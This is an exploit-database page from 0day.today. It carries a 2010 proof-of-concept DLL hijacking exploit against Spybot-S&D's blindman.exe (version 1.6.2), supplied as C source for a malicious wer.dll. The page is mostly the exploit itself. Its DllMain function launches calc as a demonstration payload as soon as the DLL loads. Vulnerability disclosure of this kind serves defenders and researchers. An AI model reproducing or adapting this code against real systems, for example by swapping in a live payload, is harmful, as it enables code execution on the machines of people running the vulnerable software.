[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Spybot-S&D blindman.exe DLL Hijacking (wer.dll)

Author
kB0]1_
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13918
Category
local exploits
Date add
31-08-2010
Platform
windows
===============================================
Spybot-S&D blindman.exe DLL Hijacking (wer.dll)
===============================================

/*
 Spybot-S&D blindman.exe DLL Hijacking (wer.dll)
 Date: August 30, 2010
 Author: kB0]1_
 Software : http://www.safer-networking.org/en/faq/25.html
 Version: 1.6.2
 Vulnerable Extension : .disabled
 Tested on: XP Pro SP2
*/

#include <windows.h>
 
int pwnme()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}
 
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  pwnme();
  return 0;
}



#  0day.today [2024-09-28]  #